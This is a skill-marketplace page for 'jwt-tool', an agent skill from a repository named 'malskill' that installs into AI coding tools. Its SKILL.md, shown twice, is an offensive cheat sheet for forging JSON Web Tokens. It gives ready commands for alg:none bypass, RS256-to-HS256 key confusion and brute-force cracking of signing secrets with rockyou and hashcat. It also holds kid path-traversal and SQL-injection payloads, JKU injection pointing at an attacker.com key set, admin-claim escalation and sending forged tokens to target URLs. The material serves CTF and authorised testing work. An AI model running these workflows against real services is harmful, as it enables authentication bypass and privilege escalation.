Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

aeondave/jwt-tool

Name: jwt-tool
Author: aeondave

offensive-tools/web/jwt-tool/SKILL.md

npx skillsauth add aeondave/malskill jwt-tool

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

jwt_tool

JWT testing suite — alg:none, algorithm confusion, KID injection, JKU/X5U, secret crack.

Quick Start

git clone https://github.com/ticarpi/jwt_tool
cd jwt_tool && pip3 install -r requirements.txt

TOKEN="eyJ..."

# Decode and inspect
python3 jwt_tool.py $TOKEN

# Run full automated playbook (test all vulns)
python3 jwt_tool.py $TOKEN -M pb

# Test alg:none
python3 jwt_tool.py $TOKEN -X a

# Brute force secret
python3 jwt_tool.py $TOKEN -C -d /usr/share/wordlists/rockyou.txt

# Algorithm confusion (RS256 → HS256)
python3 jwt_tool.py $TOKEN -X k -pk public.pem

# Interactive tamper (modify claims)
python3 jwt_tool.py $TOKEN -T

Core Flags

| Flag | Purpose | |------|---------| | TOKEN | JWT to analyze (positional) | | -M pb | Playbook mode — automated full audit | | -X <mode> | Exploit mode (see table) | | -C | Crack mode — brute force HMAC secret | | -d <file> | Wordlist for cracking | | -T | Interactive tamper mode | | -V | Verify signature | | -pk <file> | Private or public key file (.pem) | | -I | Injection mode (modify claims non-interactively) | | -hc <claim> | Header claim to modify | | -hv <value> | Header claim value | | -pc <claim> | Payload claim to modify | | -pv <value> | Payload claim value | | -S <alg> | Sign with algorithm: hs256 / rs256 / hs384 etc. | | -t <url> | Send forged token to target URL | | -rh <headers> | Request headers for -t | | -rc <cookies> | Request cookies for -t | | -cv <value> | Canary value — confirm exploitation success |

Exploit Modes (`-X`)

| Mode | Flag | Attack | |------|------|--------| | a | -X a | alg:none — remove signature requirement | | k | -X k -pk pub.pem | Key confusion — RS256→HS256 with public key as HMAC secret | | s | -X s -ju URL | JKU injection — point to attacker-controlled JWKS | | n | -X n | Null signature — empty signature field |

Common Attack Workflows

1. Automated Playbook (start here)

python3 jwt_tool.py $TOKEN -M pb
# Tests all known attack types automatically

2. alg:none Bypass

python3 jwt_tool.py $TOKEN -X a
# Also try: set role/admin claim before
python3 jwt_tool.py $TOKEN -X a -I -pc role -pv admin

3. Algorithm Confusion (RS256 → HS256)

# Need server's public key (from JWKS endpoint or certificate)
# Get from: https://target.com/.well-known/jwks.json
# Extract PEM with: python3 jwt_tool.py $TOKEN -X k

python3 jwt_tool.py $TOKEN -X k -pk public.pem
# Also escalate privilege:
python3 jwt_tool.py $TOKEN -X k -pk public.pem -I -pc admin -pv true

4. Secret Brute Force

# Standard wordlist
python3 jwt_tool.py $TOKEN -C -d /usr/share/wordlists/rockyou.txt

# Custom small list (CTF)
python3 jwt_tool.py $TOKEN -C -d ctf_secrets.txt

# Fast alternative with hashcat (GPU)
# Extract: <header>.<payload>.<signature>
echo -n "$TOKEN" | hashcat -a 0 -m 16500 - wordlist.txt

5. KID Injection

# Path traversal (sign with /dev/null = empty key)
python3 jwt_tool.py $TOKEN -I -hc kid -hv "../../dev/null" -S hs256 -p ""

# Path traversal to known file
python3 jwt_tool.py $TOKEN -I -hc kid -hv "../../etc/passwd" -S hs256 -p "root:x:0:0:..."

# SQL injection in kid
python3 jwt_tool.py $TOKEN -I -hc kid -hv "none' UNION SELECT 'hacked'-- -" -S hs256 -p "hacked"

6. JKU / X5U Injection

# Host malicious JWKS at https://attacker.com/.well-known/jwks.json
# jwt_tool auto-generates the JWKS and uses attacker key

python3 jwt_tool.py $TOKEN -X s -ju "https://attacker.com/.well-known/jwks.json"

7. Interactive Claim Tampering

# Interactive: shows each field, lets you edit
python3 jwt_tool.py $TOKEN -T

# Non-interactive: set specific claim
python3 jwt_tool.py $TOKEN -I -pc sub -pv admin
python3 jwt_tool.py $TOKEN -I -pc role -pv superadmin
python3 jwt_tool.py $TOKEN -I -pc is_admin -pv true

8. Verify Signature

python3 jwt_tool.py $TOKEN -V -pk public.pem

Send Forged Token to Target

# Test forged token directly
python3 jwt_tool.py $TOKEN -X a \
    -t "https://target.com/api/admin" \
    -rh "Authorization: Bearer TARGETJWT" \
    -cv "admin panel"    # confirm success if this string appears

Quick CTF Checklist

# 1. alg:none
python3 jwt_tool.py $TOKEN -X a

# 2. Common secrets
python3 jwt_tool.py $TOKEN -C -d /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt

# 3. Algorithm confusion (if RS256)
python3 jwt_tool.py $TOKEN -X k

# 4. Tamper claims
python3 jwt_tool.py $TOKEN -T

# 5. kid path traversal
python3 jwt_tool.py $TOKEN -I -hc kid -hv "../../dev/null" -S hs256 -p ""

# 6. Full playbook
python3 jwt_tool.py $TOKEN -M pb

Resources

| File | When to load | |------|--------------| | references/jwt-attacks.md | Algorithm confusion deep-dive, KID SQLi, JKU server setup, claim escalation patterns, CTF tricks |

aeondave/jwt-tool

offensive-tools/web/jwt-tool/SKILL.md

Auth/lab ref: broad JWT testing and exploitation toolkit.

4 stars

tools

Updated Jun 8, 2026

$ install --global

skillsauth

npx skillsauth add aeondave/malskill jwt-tool

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Jun 8, 2026, 4:09 AM191.2s1 file scanned

SKILL.md

name:: jwt-tool
description:: Auth/lab ref: broad JWT testing and exploitation toolkit.
license:: GNU GPL v3
compatibility:: Linux / macOS / Windows; Python 3.
author:: AeonDave
version:: 1.0

jwt_tool

JWT testing suite — alg:none, algorithm confusion, KID injection, JKU/X5U, secret crack.

Quick Start

git clone https://github.com/ticarpi/jwt_tool
cd jwt_tool && pip3 install -r requirements.txt

TOKEN="eyJ..."

# Decode and inspect
python3 jwt_tool.py $TOKEN

# Run full automated playbook (test all vulns)
python3 jwt_tool.py $TOKEN -M pb

# Test alg:none
python3 jwt_tool.py $TOKEN -X a

# Brute force secret
python3 jwt_tool.py $TOKEN -C -d /usr/share/wordlists/rockyou.txt

# Algorithm confusion (RS256 → HS256)
python3 jwt_tool.py $TOKEN -X k -pk public.pem

# Interactive tamper (modify claims)
python3 jwt_tool.py $TOKEN -T

Core Flags

Exploit Modes (`-X`)

Common Attack Workflows

1. Automated Playbook (start here)

python3 jwt_tool.py $TOKEN -M pb
# Tests all known attack types automatically

2. alg:none Bypass

python3 jwt_tool.py $TOKEN -X a
# Also try: set role/admin claim before
python3 jwt_tool.py $TOKEN -X a -I -pc role -pv admin

3. Algorithm Confusion (RS256 → HS256)

# Need server's public key (from JWKS endpoint or certificate)
# Get from: https://target.com/.well-known/jwks.json
# Extract PEM with: python3 jwt_tool.py $TOKEN -X k

python3 jwt_tool.py $TOKEN -X k -pk public.pem
# Also escalate privilege:
python3 jwt_tool.py $TOKEN -X k -pk public.pem -I -pc admin -pv true

4. Secret Brute Force

# Standard wordlist
python3 jwt_tool.py $TOKEN -C -d /usr/share/wordlists/rockyou.txt

# Custom small list (CTF)
python3 jwt_tool.py $TOKEN -C -d ctf_secrets.txt

# Fast alternative with hashcat (GPU)
# Extract: <header>.<payload>.<signature>
echo -n "$TOKEN" | hashcat -a 0 -m 16500 - wordlist.txt

5. KID Injection

# Path traversal (sign with /dev/null = empty key)
python3 jwt_tool.py $TOKEN -I -hc kid -hv "../../dev/null" -S hs256 -p ""

# Path traversal to known file
python3 jwt_tool.py $TOKEN -I -hc kid -hv "../../etc/passwd" -S hs256 -p "root:x:0:0:..."

# SQL injection in kid
python3 jwt_tool.py $TOKEN -I -hc kid -hv "none' UNION SELECT 'hacked'-- -" -S hs256 -p "hacked"

6. JKU / X5U Injection

# Host malicious JWKS at https://attacker.com/.well-known/jwks.json
# jwt_tool auto-generates the JWKS and uses attacker key

python3 jwt_tool.py $TOKEN -X s -ju "https://attacker.com/.well-known/jwks.json"

7. Interactive Claim Tampering

# Interactive: shows each field, lets you edit
python3 jwt_tool.py $TOKEN -T

# Non-interactive: set specific claim
python3 jwt_tool.py $TOKEN -I -pc sub -pv admin
python3 jwt_tool.py $TOKEN -I -pc role -pv superadmin
python3 jwt_tool.py $TOKEN -I -pc is_admin -pv true

8. Verify Signature

python3 jwt_tool.py $TOKEN -V -pk public.pem

Send Forged Token to Target

# Test forged token directly
python3 jwt_tool.py $TOKEN -X a \
    -t "https://target.com/api/admin" \
    -rh "Authorization: Bearer TARGETJWT" \
    -cv "admin panel"    # confirm success if this string appears

Quick CTF Checklist

# 1. alg:none
python3 jwt_tool.py $TOKEN -X a

# 2. Common secrets
python3 jwt_tool.py $TOKEN -C -d /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt

# 3. Algorithm confusion (if RS256)
python3 jwt_tool.py $TOKEN -X k

# 4. Tamper claims
python3 jwt_tool.py $TOKEN -T

# 5. kid path traversal
python3 jwt_tool.py $TOKEN -I -hc kid -hv "../../dev/null" -S hs256 -p ""

# 6. Full playbook
python3 jwt_tool.py $TOKEN -M pb

Resources

| File | When to load | |------|--------------| | references/jwt-attacks.md | Algorithm confusion deep-dive, KID SQLi, JKU server setup, claim escalation patterns, CTF tricks |

Related Skills

aeondave/vibe-audit-technique

development

VerifiedTrustedCommunity

White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).

4SKILL.mdUpdated Jun 12, 2026

aeondave/vibe-audit-technique

aeondave/source-review-technique

development

VerifiedTrustedCommunity

Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.

4SKILL.mdUpdated Jun 12, 2026

aeondave/source-review-technique

aeondave/hardware-technique

development

VerifiedTrustedCommunity

Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.

4SKILL.mdUpdated Jun 12, 2026

aeondave/hardware-technique

aeondave/container-technique

devops

VerifiedTrustedCommunity

Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.

4SKILL.mdUpdated Jun 12, 2026

aeondave/container-technique

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/aeondave/malskill.git

# Copy into Claude Code skills folder (global)
cp -r malskill/offensive-tools/web/jwt-tool ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

aeondave/malskill

4 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT

Adoption

aeondave/jwt-tool

$ install --global

Security Scan Results

SKILL.md

jwt_tool

Quick Start

Core Flags

Exploit Modes (-X)

Common Attack Workflows

1. Automated Playbook (start here)

2. alg:none Bypass

3. Algorithm Confusion (RS256 → HS256)

4. Secret Brute Force

5. KID Injection

6. JKU / X5U Injection

7. Interactive Claim Tampering

8. Verify Signature

Send Forged Token to Target

Quick CTF Checklist

Resources

Related Skills

aeondave/vibe-audit-technique

aeondave/source-review-technique

aeondave/hardware-technique

aeondave/container-technique

aeondave/jwt-tool

$ install --global

Security Scan Results

SKILL.md

jwt_tool

Quick Start

Core Flags

Exploit Modes (-X)

Common Attack Workflows

1. Automated Playbook (start here)

2. alg:none Bypass

3. Algorithm Confusion (RS256 → HS256)

4. Secret Brute Force

5. KID Injection

6. JKU / X5U Injection

7. Interactive Claim Tampering

8. Verify Signature

Send Forged Token to Target

Quick CTF Checklist

Resources

Related Skills

aeondave/vibe-audit-technique

aeondave/source-review-technique

aeondave/hardware-technique

aeondave/container-technique

Exploit Modes (`-X`)

Exploit Modes (`-X`)